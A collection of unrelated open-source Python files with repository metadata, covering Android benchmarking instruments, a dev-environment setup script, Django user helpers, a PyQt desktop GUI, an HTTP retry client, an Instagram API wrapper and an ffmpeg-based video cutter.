This instrument is deprecated and should not be used. It will be removed in
future versions of Workload Automation.
Versions of Android packages are now automatically attached to the results as
"apk_version" classfiers.
"""
def __init__(self, device, **kwargs):
super(ApkVersion, self).__init__(device, **kwargs)
self.apk_info = None
def setup(self, context):
if hasattr(context.workload, 'apk_file'):
self.apk_info = ApkInfo(context.workload.apk_file)
else:
self.apk_info = None
def update_result(self, context):
if self.apk_info:
context.result.add_metric(self.name, self.apk_info.version_name)
class InterruptStatsInstrument(Instrument):
name = 'interrupts'
description = """
Pulls the ``/proc/interrupts`` file before and after workload execution and diffs them
to show what interrupts occurred during that time.
"""
def __init__(self, device, **kwargs):
super(InterruptStatsInstrument, self).__init__(device, **kwargs)
self.before_file = None
self.after_file = None
self.diff_file = None
def setup(self, context):
self.before_file = os.path.join(context.output_directory, 'before', 'proc', 'interrupts')
self.after_file = os.path.join(context.output_directory, 'after', 'proc', 'interrupts')
self.diff_file = os.path.join(context.output_directory, 'diff', 'proc', 'interrupts')
def start(self, context):
with open(_f(self.before_file), 'w') as wfh:
wfh.write(self.device.execute('cat /proc/interrupts'))
def stop(self, context):
with open(_f(self.after_file), 'w') as wfh:
wfh.write(self.device.execute('cat /proc/interrupts'))
def update_result(self, context):
# If workload execution failed, the after_file may not have been created.
if os.path.isfile(self.after_file):
_diff_interrupt_files(self.before_file, self.after_file, _f(self.diff_file))
class DynamicFrequencyInstrument(SysfsExtractor):
name = 'cpufreq'
description = """
Collects dynamic frequency (DVFS) settings before and after workload execution.
"""
tarname = 'cpufreq.tar'
parameters = [
Parameter('paths', mandatory=False, override=True),
]
def setup(self, context):
self.paths = ['/sys/devices/system/cpu']
if self.use_tmpfs:
self.paths.append('/sys/class/devfreq/*') # the '*' would cause problems for adb pull.
super(DynamicFrequencyInstrument, self).setup(context)
def validate(self):
# temp-fs would have been set in super's validate, if not explicitly specified.
if not self.tmpfs_mount_point.endswith('-cpufreq'): # pylint: disable=access-member-before-definition
self.tmpfs_mount_point += '-cpufreq'
def _diff_interrupt_files(before, after, result): # pylint: disable=R0914
output_lines = []
with open(before) as bfh:
with open(after) as ofh:
for bline, aline in izip(bfh, ofh):
bchunks = bline.strip().split()
while True:
achunks = aline.strip().split()
if achunks[0] == bchunks[0]:
diffchunks = ['']
diffchunks.append(achunks[0])
diffchunks.extend([diff_tokens(b, a) for b, a
in zip(bchunks[1:], achunks[1:])])
output_lines.append(diffchunks)
break
else: # new category appeared in the after file
diffchunks = ['>'] + achunks
output_lines.append(diffchunks)
try:
aline = ofh.next()
except StopIteration:
break
# Offset heading columns by one to allow for row labels on subsequent
# lines.
output_lines[0].insert(0, '')
# Any "columns" that do not have headings in the first row are not actually
# columns -- they are a single column where space-spearated words got
# split. Merge them back together to prevent them from being
# column-aligned by write_table.
table_rows = [output_lines[0]]
num_cols = len(output_lines[0])
for row in output_lines[1:]:
table_row = row[:num_cols]
table_row.append(' '.join(row[num_cols:]))
table_rows.append(table_row)
with open(result, 'w') as wfh:
write_table(table_rows, wfh)
def _diff_sysfs_dirs(before, after, result): # pylint: disable=R0914
before_files = []
os.path.walk(before,
lambda arg, dirname, names: arg.extend([os.path.join(dirname, f) for f in names]),
before_files
)
before_files = filter(os.path.isfile, before_files)
files = [os.path.relpath(f, before) for f in before_files]
after_files = [os.path.join(after, f) for f in files]
diff_files = [os.path.join(result, f) for f in files]
for bfile, afile, dfile in zip(before_files, after_files, diff_files):
if not os.path.isfile(afile):
logger.debug('sysfs_diff: {} does not exist or is not a file'.format(afile))
continue
with open(bfile) as bfh, open(afile) as afh: # pylint: disable=C0321
with open(_f(dfile), 'w') as dfh:
for i, (bline, aline) in enumerate(izip_longest(bfh, afh), 1):
if aline is None:
logger.debug('Lines missing from {}'.format(afile))
break
bchunks = re.split(r'(\W+)', bline)
achunks = re.split(r'(\W+)', aline)
if len(bchunks) != len(achunks):
logger.debug('Token length mismatch in {} on line {}'.format(bfile, i))
dfh.write('xxx ' + bline)
continue
if ((len([c for c in bchunks if c.strip()]) == len([c for c in achunks if c.strip()]) == 2) and
(bchunks[0] == achunks[0])):
# if there are only two columns and the first column is the
# same, assume it's a "header" column and do not diff it.
dchunks = [bchunks[0]] + [diff_tokens(b, a) for b, a in zip(bchunks[1:], achunks[1:])]
else:
dchunks = [diff_tokens(b, a) for b, a in zip(bchunks, achunks)]
dfh.write(''.join(dchunks))
|
chase-qi/workload-automation
|
wlauto/instrumentation/misc/__init__.py
|
Python
|
apache-2.0
| 17,103
|
__author__ = u'schmatz'
import errors
import configuration
import mongo
import node
import repositoryInstaller
import ruby
import shutil
import os
import glob
import subprocess
def print_computer_information(os_name,address_width):
print(os_name + " detected, architecture: " + str(address_width) + " bit")
def constructSetup():
config = configuration.Configuration()
address_width = config.system.get_virtual_memory_address_width()
if config.system.operating_system == u"mac":
print_computer_information("Mac",address_width)
return MacSetup(config)
elif config.system.operating_system == u"win":
print_computer_information("Windows",address_width)
raise NotImplementedError("Windows is not supported at this time.")
elif config.system.operating_system == u"linux":
print_computer_information("Linux",address_width)
return LinuxSetup(config)
class SetupFactory(object):
def __init__(self,config):
self.config = config
self.mongo = mongo.MongoDB(self.config)
self.node = node.Node(self.config)
self.repoCloner = repositoryInstaller.RepositoryInstaller(self.config)
self.ruby = ruby.Ruby(self.config)
def setup(self):
mongo_version_string = ""
try:
mongo_version_string = subprocess.check_output("mongod --version",shell=True)
except:
print("Mongod not found.")
if "v2.5.4" not in mongo_version_string:
print("MongoDB 2.5.4 not found, so installing...")
self.mongo.download_dependencies()
self.mongo.install_dependencies()
self.node.download_dependencies()
self.node.install_dependencies()
#self.repoCloner.cloneRepository()
self.repoCloner.install_node_packages()
self.ruby.install_gems()
print ("Doing initial bower install...")
bower_path = self.config.directory.root_dir + os.sep + "coco" + os.sep + "node_modules" + os.sep + ".bin" + os.sep + "bower"
subprocess.call(bower_path + " --allow-root install",shell=True,cwd=self.config.directory.root_dir + os.sep + "coco")
print("Removing temporary directories")
self.config.directory.remove_tmp_directory()
print("Changing permissions of files...")
#TODO: Make this more robust and portable(doesn't pose security risk though)
subprocess.call("chmod -R 755 " + self.config.directory.root_dir + os.sep + "coco" + os.sep + "bin",shell=True)
chown_command = "chown -R " + os.getenv("SUDO_USER") + " bower_components"
chown_directory = self.config.directory.root_dir + os.sep + "coco"
subprocess.call(chown_command,shell=True,cwd=chown_directory)
print("Done! If you want to start the server, head into /coco/bin and run ")
print("1. ./coco-mongodb")
print("2. ./coco-brunch ")
print("3. ./coco-dev-server")
print("NOTE: brunch may need to be run as sudo if it doesn't work (ulimit needs to be set higher than default)")
print("Once brunch is done, visit http://localhost:3000!")
def cleanup(self):
self.config.directory.remove_tmp_directory()
class MacSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
class WinSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
class LinuxSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
|
5y/codecombat
|
scripts/devSetup/factories.py
|
Python
|
mit
| 3,479
|
from django.contrib.auth.models import User
from django_countries import countries
def get_user(user_id):
user = User.objects.get(id=user_id)
return user
def get_user_profile(user_id):
user = User.objects.get(id=user_id)
return user.profile
def get_ambassadors(country_code=None):
ambassadors = []
all_ambassadors = User.objects.filter(groups__name='ambassadors').order_by('date_joined')
for ambassador in all_ambassadors:
if country_code:
if ambassador.profile.country == country_code:
ambassadors.append(ambassador.profile)
else:
ambassadors.append(ambassador.profile)
return ambassadors
def get_main_ambassadors(country_code=None):
ambassadors = []
all_ambassadors = User.objects.filter(groups__name='main').order_by('date_joined')
for ambassador in all_ambassadors:
if country_code:
if ambassador.profile.country == country_code:
ambassadors.append(ambassador.profile)
else:
ambassadors.append(ambassador.profile)
return ambassadors
def get_not_main_ambassadors(country_code=None):
ambassadors = []
all_ambassadors = User.objects.filter(groups__name='ambassadors').exclude(groups__name='main').order_by('date_joined')
for ambassador in all_ambassadors:
if country_code:
if ambassador.profile.country == country_code:
ambassadors.append(ambassador.profile)
else:
ambassadors.append(ambassador.profile)
return ambassadors
def get_ambassadors_for_countries():
ambassadors = get_ambassadors()
countries_ambassadors = []
# list countries minus two CUSTOM_COUNTRY_ENTRIES
for code, name in list(countries)[2:]:
readable_name = unicode(name)
main_ambassadors = get_main_ambassadors(code)
found_ambassadors = get_not_main_ambassadors(code)
countries_ambassadors.append((code, readable_name,found_ambassadors, main_ambassadors))
countries_ambassadors.sort()
return countries_ambassadors
def get_ambassadors_for_country(country):
ambassadors = User.objects.filter(groups__name='ambassadors', userprofile__country=country)
return ambassadors
def update_user_email(user_id, new_email):
user = User.objects.get(id=user_id)
user.email = new_email
user.save(update_fields=["email"])
return user
|
ercchy/coding-events
|
web/processors/user.py
|
Python
|
mit
| 2,185
|
import globals
from globals import PLATFORM, FROZEN, BASEDIR
from PyQt5.QtWidgets import QSystemTrayIcon, QWidget, QMenu, QSplashScreen
from PyQt5 import QtGui
from PyQt5 import QtPrintSupport
from PyQt5 import QtCore
import sys, webbrowser
from PyQt5.QtCore import *
from PyQt5.QtWebKitWidgets import *
from PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog
from datetime import datetime
class Aether(QApplication):
def __init__(self):
QApplication.__init__(self, sys.argv)
QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps)
QApplication.setQuitOnLastWindowClosed(False)
def onClickOnDock(self): # This only gets called on Mac.
##print('dock clicked')
self.view.show()
self.view.raise_() # because the app needs to fire up in the bg to be brought to front.
globals.raiseAndFocusApp()
class ModifierEventFilter(QObject):
def eventFilter(self, receiver, event):
if (event.type() == QEvent.KeyPress):
if (event.modifiers() == QtCore.Qt.ControlModifier and event.key() == QtCore.Qt.Key_W):
self.view.hide()
return True
elif (event.key() == QtCore.Qt.Key_Control): # Control is Cmd in Mac.
global lastModifierKeypressDatetime
lastModifierKeypressDatetime = datetime.now()
return True
elif (event.key() == QtCore.Qt.Key_Escape): # Control is Cmd in Mac.
return True # Esc key does not move. Return true stops the propagation there.
else:
#Call Base Class Method to Continue Normal Event Processing
return super(ModifierEventFilter,self).eventFilter(receiver, event)
#elif (event.type() == QEvent.ApplicationActivate):
# ##print('app activate fired')
# view.show()
# toggleVisibilityMenuItem.setText('Hide Aether')
#
# return True
else:
#Call Base Class Method to Continue Normal Event Processing
return super(ModifierEventFilter,self).eventFilter(receiver, event)
class AetherMainWindow(QMainWindow):
def __init__(self, charon, reactor, baseurl, app):
super(AetherMainWindow, self).__init__()
self.resize(1148, 680)
self.app = app
self.reactor = reactor
webView = AetherWebView(reactor, baseurl)
webView.page().mainFrame().addToJavaScriptWindowObject("Charon", charon)
webView.page().setLinkDelegationPolicy(QWebPage.DelegateAllLinks)
self.setContextMenuPolicy(Qt.NoContextMenu)
self.setCentralWidget(webView)
self.webView = webView
self.JSContext = webView.page().mainFrame().evaluateJavaScript
self.Hermes = charon.Hermes
#self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
if PLATFORM == 'WIN':
self.setWindowIcon(QtGui.QIcon(BASEDIR + 'Assets/aether-white-tray.ico'))
# from PyQt5.QtWebKit import QWebSettings
# QWebSettings.globalSettings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True)
# self.inspector = QWebInspector()
# self.inspector.resize(1450, 300)
# self.inspector.move(0,0)
# self.inspector.setPage(self.webView.page())
# self.setContextMenuPolicy(Qt.DefaultContextMenu)
def hideEvent(self, QHideEvent):
if PLATFORM == 'LNX':
# Linux GUI behaves differently: since there is no tray icon or a background process, when
# the app is closed by pressing the X button, it actually has to be closed. It can't keep running.
self.pp.stop()
if self.reactor.threadpool is not None:
self.reactor.threadpool.stop()
self.close()
self.reactor.stop()
self.app.quit()
sys.exit()
class AetherWebView(QWebView):
def __init__(self, reactor, baseurl):
super(AetherWebView, self).__init__()
self.reactor = reactor
if FROZEN:
self.load(QUrl('file:///' + BASEDIR + 'GUI/WebKitApp/index.html'))
else:
self.load(QUrl('file:///' + baseurl + 'GUI/WebKitApp/index.html'))
self.page().action(QWebPage.Reload).setVisible(False)
self.page().setLinkDelegationPolicy(QWebPage.DelegateAllLinks)
def linkClick(url):
webbrowser.open(str(url.toString()))
self.linkClicked.connect(linkClick)
class SystemTrayIcon(QSystemTrayIcon):
def __init__(self, basedir, app, parent=None):
if PLATFORM == 'OSX':
if app.devicePixelRatio() == 2:
self.icon = QtGui.QIcon(BASEDIR+'Assets/aether-black-tray.svg')
self.iconActive = QtGui.QIcon(BASEDIR+'Assets/aether-white-tray.svg')
self.iconHighlight = QtGui.QIcon(BASEDIR+'Assets/aether-blue-tray.svg')
else:
self.icon = QtGui.QIcon(BASEDIR+'Assets/aether-black-tray.png')
self.iconActive = QtGui.QIcon(BASEDIR+'Assets/aether-white-tray.png')
self.iconHighlight = QtGui.QIcon(BASEDIR+'Assets/aether-blue-tray.png')
elif PLATFORM == 'WIN':
self.icon = QtGui.QIcon(BASEDIR+'Assets/aether-white-tray-win.svg')
self.iconActive = self.icon
self.iconHighlight = QtGui.QIcon(BASEDIR+'Assets/aether-green-tray-win.svg')
else:
pass
QSystemTrayIcon.__init__(self, self.icon, parent)
self.menu = QMenu(parent)
if globals.appIsPaused:
self.menu.addAction('Paused').setDisabled(True)
else:
self.menu.addAction('Online').setDisabled(True)
self.globalStatusMenuItem = self.menu.actions()[0]
self.menu.addSeparator() # 1
self.menu.addAction('You have no replies.').setDisabled(True)
self.messagesMenuItem = self.menu.actions()[2]
def goToMessages():
self.messagesMenuItem.setText('You have no replies.')
self.messagesMenuItem.setDisabled(True)
parent.show()
parent.raise_()
jsString = \
("firstFrameScope = angular.element(document.getElementById('first-frame-contents')).scope();"
"firstFrameScope.repliesButtonClick();"
"firstFrameScope.$apply();"
)
self.webView.JSContext(jsString)
# reach out to jscontext and
# Here, I need to call qtwebkit and tell it to open messages.
self.messagesMenuItem.triggered.connect(goToMessages)
self.menu.addSeparator() # 3
if globals.appIsPaused:
self.menu.addAction('Resume')
else:
self.menu.addAction('Pause')
self.togglePauseMenuItem = self.menu.actions()[4]
def togglePause():
if globals.appIsPaused:
globals.appIsPaused = False
self.togglePauseMenuItem.setText('Pause')
self.globalStatusMenuItem.setText('Online')
else:
globals.appIsPaused = True
self.togglePauseMenuItem.setText('Resume')
self.globalStatusMenuItem.setText('Paused')
self.togglePauseMenuItem.triggered.connect(togglePause)
self.menu.addAction('Show Aether')
self.toggleVisibilityMenuItem = self.menu.actions()[5]
def makeVisible():
parent.show()
parent.raise_()
if PLATFORM == 'OSX':
globals.raiseAndFocusApp()
self.toggleVisibilityMenuItem.triggered.connect(makeVisible)
self.menu.addAction('Email the developer')
self.emailDevMenuItem = self.menu.actions()[6]
def emailDev():
mailInitialiser = \
QUrl('mailto:burak@nehbit.net'
'?subject=Feedback for Aether'
'&body=Hello there! Thanks for taking time to give feedback, I really appreciate it. '
'If you are having problems, please follow the directions at www.getaether.net/sending_logs, '
'and send me the produced logs. Thanks! You can delete this text before sending. '
'You can find my PGP key here: pgp.mit.edu:11371/pks/lookup?search=Burak+Nehbit')
QtGui.QDesktopServices.openUrl(mailInitialiser)
self.emailDevMenuItem.triggered.connect(emailDev)
self.menu.addSeparator() # 5
self.menu.addAction('Settings')
self.settingsMenuItem = self.menu.actions()[8]
def goToSettings():
self.settingsMenuItem.setText('Settings')
self.settingsMenuItem.setDisabled(False)
if parent.isHidden():
parent.show()
parent.raise_()
jsString = \
("firstFrameScope = angular.element(document.getElementById('first-frame-contents')).scope();"
"firstFrameScope.settingsButtonClick();"
"firstFrameScope.$apply();"
)
self.webView.JSContext(jsString)
self.settingsMenuItem.triggered.connect(goToSettings)
self.menu.addSeparator() # 6
self.menu.addAction('Quit Aether')
self.quitAppMenuItem = self.menu.actions()[10]
# This is below reactor.run to allow access from other places outside main.
def quitApp():
# This is buggy...
if parent.reactor.threadpool is not None:
parent.reactor.threadpool.stop()
parent.close()
parent.reactor.stop()
app.quit()
sys.exit()
# self.protInstance.killApp()
# def finishExit():
# parent.reactor.stop()
# app.quit()
# sys.exit()
# d.addCallback(finishExit)
self.quitAppMenuItem.triggered.connect(quitApp)
self.setContextMenu(self.menu)
self.setIcon(self.icon)
def changeIconToActiveState():
self.setIcon(self.iconActive)
def changeIconToPassiveState():
self.setIcon(self.icon)
self.menu.aboutToShow.connect(changeIconToActiveState)
self.menu.aboutToHide.connect(changeIconToPassiveState)
if PLATFORM == 'WIN':
def showOnLeftClick(reason):
if reason == self.Trigger:
makeVisible() # I hate that Python doesn't have anonymous functions.
self.activated.connect(showOnLeftClick)
def lightUpIcon(self):
self.setIcon(self.iconHighlight)
self.messagesMenuItem.setText('New replies available.')
self.messagesMenuItem.setDisabled(False)
def makeIconGoDark(self):
self.setIcon(self.icon)
self.messagesMenuItem.setText('You have no replies.')
self.messagesMenuItem.setDisabled(True)
|
GeoffMaciolek/aether-public
|
GUI/guiElements.py
|
Python
|
agpl-3.0
| 10,851
|
import time
import functools
import itertools as it
import requests
from requests.exceptions import ConnectTimeout, ReadTimeout, ConnectionError
from circuit import CircuitOpenError
import logging
from .breaker import CircuitBreakerSet
from .exceptions import AllHostsUnreachableException, MaxRetriesReached
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class Retriable(object):
def __init__(self, func, *args, **kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __call__(self, **new_kwargs):
kwargs = self.kwargs.copy()
kwargs.update(new_kwargs)
return self.func(*self.args, **kwargs)
def __repr__(self):
return '<Retriable (%s, %s, %s)>' % (self.func, self.args, self.kwargs)
class SmartClient(object):
'''This client is used when dealing with existing client libraries that
issue their own requests (whether HTTP or some other protocol). This client
then provides
To create an instance, you need to let it know about the types of errors
that it can catch in order to retry. For HTTP, this is typically connection
releated errors, however your library might wrap them.
There are 2 ways to make a function retriable. The first is by creating a
retriable object::
# create the signature
retriable = smart_client.Retriable(my_client.retrieve, id)
# now execute it
item = smart_client.retry(retriable, max_tries=5)
The second is using retry() as as decorator:
@smart_client.retry
def get_object(id):
return my_client.retrieve(id)
@smart_client.retry(max_tries=5)
def get_object(id):
return my_client.retrieve(id)
'''
Retriable = Retriable
def __init__(self, name, error_types=None, hosts_provider=None, hosts=None):
self.name = name
self.error_types = error_types
self.breakers = CircuitBreakerSet(error_types or [])
# TODO: Check that one and only one of these is specified.
self._hosts_iter = it.cycle(hosts) if hosts else None
self._hosts_provider = hosts_provider
def get_hostname(self):
if self._hosts_provider:
return self._hosts_provider.get_hostname()
else:
return next(self._hosts_iter)
def retry(self, retriable=None, max_tries=3, backoff=None, send_host=False):
# Creating a decorator: @client.retry(max_tries=5)
if retriable is None:
return functools.partial(self.retry, max_tries=max_tries, backoff=backoff, send_host=send_host)
# Being used as a decorator: @client.retry
if not isinstance(retriable, Retriable):
@functools.wraps(retriable)
def wrapper(*args, **kwargs):
_retriable = Retriable(retriable, *args, **kwargs)
self.retry(_retriable, max_tries=max_tries, backoff=backoff, send_host=send_host)
return wrapper
# actually do the retries
for i in xrange(1, max_tries + 1):
host = self.get_hostname()
try:
logger.info('Attempting %s for host %s ...' % (retriable, host))
with self.breakers.context(host):
if send_host:
return retriable(host=host)
else:
return retriable()
except CircuitOpenError:
if self.breakers.all_closed():
raise AllHostsUnreachable('All hosts unreachable for %s' % self.name)
logger.warning('Silenced request failure for host %s due to CircuitOpenError.', host)
except tuple(self.breakers.error_types) as e:
logger.warning('Silenced %s for host %s.', e, host)
if backoff and i < max_tries: # Don't sleep after last attempt
time.sleep(backoff() if callable(backoff) else backoff)
raise MaxRetriesReached('Attempted %d times for %s' % (max_tries, self.name))
class SmartHTTPClient(SmartClient):
'''A smart HTTP client that knows about the requests library's error types.
You must provided a hosts_provider or a host list.
'''
HTTP_ERROR_TYPES = (ConnectTimeout, ReadTimeout, ConnectionError)
def __init__(self, name, hosts_provider=None, hosts=None):
super(SmartHTTPClient, self).__init__(name, self.HTTP_ERROR_TYPES, hosts_provider, hosts)
# Keep a session per host
self._sessions = {}
def get(self, path, *args, **kwargs):
req = self.Retriable(self._send, 'GET', path, *args, **kwargs)
return self.retry(req, send_host=True)
def _send(self, method, path, host=None, **kwargs):
url = 'http://' + host + '/' + path.lstrip('/')
session = self.get_session(host)
prepared = session.prepare_request(requests.Request(method, url, **kwargs))
return session.send(prepared)
def get_session(self, hostname):
session = self._sessions.get(hostname)
if not session:
session = self._sessions[hostname] = requests.Session()
return session
|
jbeluch/smartclient
|
smartclient/client.py
|
Python
|
mit
| 5,176
|
from django.conf.urls import include, url
from .views import alquiler_nuevo, home
from django.contrib.auth.decorators import login_required
from departamentos.views import home, details
urlpatterns = [
]
|
acs-um/deptos
|
deptos/departamentos/urls.py
|
Python
|
apache-2.0
| 209
|
"""Plugins for starting Vumi workers from twistd."""
from vumi.servicemaker import (VumiWorkerServiceMaker,
DeprecatedStartWorkerServiceMaker)
# Having instances of IServiceMaker present magically announces the
# service makers to twistd.
# See: http://twistedmatrix.com/documents/current/core/howto/tap.html
vumi_worker = VumiWorkerServiceMaker()
start_worker = DeprecatedStartWorkerServiceMaker()
|
TouK/vumi
|
twisted/plugins/vumi_worker_starter.py
|
Python
|
bsd-3-clause
| 432
|
import sys
import os
from subprocess import call
def cut(filename, out):
with open(filename, 'r') as f:
flag = False
codes = []
for line in f.readlines():
if line.strip() == '```go':
flag = True
elif line.strip() == '```':
with open(out, 'w') as g:
g.write("".join(codes))
return
elif flag:
codes.append(line)
if __name__ == '__main__':
filename = sys.argv[1]
out = '/tmp/test.go'
cut(filename, out)
ret = call(['go', 'build', '-o', '/tmp/test', out])
os.remove(out)
os.remove('/tmp/test')
sys.exit(ret)
|
ramrunner/gobgp
|
test/scenario_test/ci-scripts/build_embeded_go.py
|
Python
|
apache-2.0
| 682
|
# -*- coding: utf-8 -*-
###############################################################################
#
# RecentlyTaggedMedia
# Retrieves a list of recently tagged media.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class RecentlyTaggedMedia(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the RecentlyTaggedMedia Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(RecentlyTaggedMedia, self).__init__(temboo_session, '/Library/Instagram/RecentlyTaggedMedia')
def new_input_set(self):
return RecentlyTaggedMediaInputSet()
def _make_result_set(self, result, path):
return RecentlyTaggedMediaResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return RecentlyTaggedMediaChoreographyExecution(session, exec_id, path)
class RecentlyTaggedMediaInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the RecentlyTaggedMedia
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((conditional, string) The access token retrieved during the OAuth 2.0 process. Required unless you provide the ClientID.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('AccessToken', value)
def set_ClientID(self, value):
"""
Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Instagram after registering your application. Required unless you provide the AccessToken.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('ClientID', value)
def set_Count(self, value):
"""
Set the value of the Count input for this Choreo. ((optional, integer) The number of results to return.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('Count', value)
def set_MaxID(self, value):
"""
Set the value of the MaxID input for this Choreo. ((optional, integer) Returns media tagged earlier than this max_tag_id. Used to paginate through results.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('MaxID', value)
def set_MinID(self, value):
"""
Set the value of the MinID input for this Choreo. ((optional, integer) Returns media tagged later than this max_tag_id. Used to paginate through results.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('MinID', value)
def set_TagName(self, value):
"""
Set the value of the TagName input for this Choreo. ((required, string) Enter a valid tag identifier, such as: nofliter)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('TagName', value)
class RecentlyTaggedMediaResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the RecentlyTaggedMedia Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Instagram.)
"""
return self._output.get('Response', None)
class RecentlyTaggedMediaChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return RecentlyTaggedMediaResultSet(response, path)
|
jordanemedlock/psychtruths
|
temboo/core/Library/Instagram/RecentlyTaggedMedia.py
|
Python
|
apache-2.0
| 4,513
|
import logging
import os
import subprocess
import sys
import shutil
import pkg_resources
import datetime as dt
from pathlib import Path
import pysrt
from PyQt5 import QtCore, QtWidgets, QtGui
from PyQt5.QtWidgets import QLabel, QPushButton, QMessageBox
from quickcut.ordered_set import OrderedSet
from quickcut.widgets import Picker, MinuteSecondEdit, BiggerMessageBox
"""
Uses ffmpeg - http://manpages.ubuntu.com/manpages/vivid/en/man1/ffmpeg.1.html
http://ffmpeg.org/ffmpeg.html#Stream-selection
See also PyAV: https://github.com/mikeboers/PyAV
"""
__author__ = 'Edward Oubrayrie'
try:
__version__ = pkg_resources.get_distribution(Path(__file__).parent.name).version
except pkg_resources.DistributionNotFound:
__version__ = '0.DEV'
ICON = pkg_resources.resource_filename('quickcut', 'quickcut.png')
logger = logging.getLogger(__name__)
def packagekit_install(pack='ffmpeg'):
"""
Equivalent of:
qdbus org.freedesktop.PackageKit /org/freedesktop/PackageKit
org.freedesktop.PackageKit.Modify.InstallPackageNames
0 ffmpeg "show-confirm-search,hide-finished"
Or:
qdbus org.freedesktop.PackageKit /org/freedesktop/PackageKit
org.freedesktop.PackageKit.Query.IsInstalled 0 ffmpeg
See also (dbus) http://www.freedesktop.org/software/PackageKit/pk-faq.html#session-methods
Doc: http://blog.fpmurphy.com/2013/11/packagekit-d-bus-abstraction-layer.html
"""
from PyQt5.QtDBus import QDBusConnection
from PyQt5.QtDBus import QDBusInterface
bus = QDBusConnection.sessionBus()
service_name = 'org.freedesktop.PackageKit'
service_path = '/org/freedesktop/PackageKit'
interface = 'org.freedesktop.PackageKit.Query.IsInstalled'
install = QDBusInterface(service_name, service_path, interface, bus)
reply = install.call(0, pack, 'show-confirm-search,hide-finished')
print(reply.arguments())
interface = 'org.freedesktop.PackageKit.Modify.InstallPackageNames'
install = QDBusInterface(service_name, service_path, interface, bus)
reply = install.call(0, pack, 'show-confirm-search,hide-finished')
print(reply.arguments())
def duration(start: dt.time, stop: dt.time) -> dt.timedelta:
return dt.datetime.combine(dt.date.min, stop) - dt.datetime.combine(dt.date.min, start)
def timedelta_str(d: dt.timedelta) -> str:
assert (d.days == 0)
hours, remainder = divmod(d.seconds, 3600)
minutes, seconds = divmod(remainder, 60)
return '%02d:%02d:%02d' % (hours, minutes, seconds)
def duration_str(h_m_s_start: [int, int, int], h_m_s_stop: [int, int, int]):
return timedelta_str(duration(dt.time(*h_m_s_start), dt.time(*h_m_s_stop)))
def video_cut(vid_in, vid_out, ss, to, d, alt_audio, parent):
# input validation:
if os.path.isfile(vid_out):
# QMessageBox(icon, '{} already exists', 'Do you want to replace it ?',
# buttons=QMessageBox.Yes, parent=parent)
msg = '{} already exists\n\nDo you want to replace it ?'.format(vid_out)
video_ret = QMessageBox.warning(parent, 'File exists', msg, defaultButton=QMessageBox.Cancel)
if video_ret == QMessageBox.Cancel:
return
try:
os.remove(vid_out)
except OSError as e:
msg = 'Cannot write {}, system returned {}.\n\n' \
'Change output file name and retry,'.format(vid_out, str(e))
QMessageBox.critical(parent, 'Wrong file', msg)
return None
video_ret = 0
if os.path.isfile(vid_in):
ffmpeg = shutil.which('ffmpeg')
avconv = shutil.which('avconv')
exe = ffmpeg or avconv
if not exe:
msg = 'Install ffmpeg or avconv'
QMessageBox.critical(parent, 'Missing dependency', msg)
return
if exe == avconv: # end_as_duration:
stop = ['-t', d]
else:
stop = ['-to', to]
command = [ffmpeg, '-nostdin', '-noaccurate_seek',
'-i', vid_in,
'-ss', ss,
stop[0], stop[1],
'-vcodec', 'copy',
'-acodec', 'copy',
'-map', '0', # all streams
]
if alt_audio:
command.extend(['-map', '-0:a:0']) # remove main audio stream
command.append(vid_out)
# "ffmpeg -i input.avi -vcodec copy -acodec copy -ss 00:00:00 -t 00:05:00 output1.avi"
# 'avconv -i "/media/eoubrayrie/STORENGO/v.mp4" -vcodec copy -acodec copy -ss 00:00:00 -t 00:05:16 output1.avi'
logger.info('%s', command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #, stderr=subprocess.STDOUT)
stdout, stderr = p.communicate()
video_ret = p.poll()
if video_ret != 0:
msg = "Error {:d} occured. Check video file or see details.".format(video_ret)
dmsg = "\n\n{}\n\n{}\n\n{}".format(stdout.decode(), '_' * 30, stderr.decode())
err_dialog = BiggerMessageBox(QMessageBox.Critical, 'Error during video cut', msg, parent=parent)
err_dialog.setDetailedText(dmsg)
err_dialog.exec()
return video_ret
def subtitle_cut(h1, m1, s1, h2, m2, s2, subs, sbt_out):
print('Decoded {} with {} items'.format(sbt_out, len(subs)))
part = subs.slice(starts_after={'hours': h1, 'minutes': m1, 'seconds': s1},
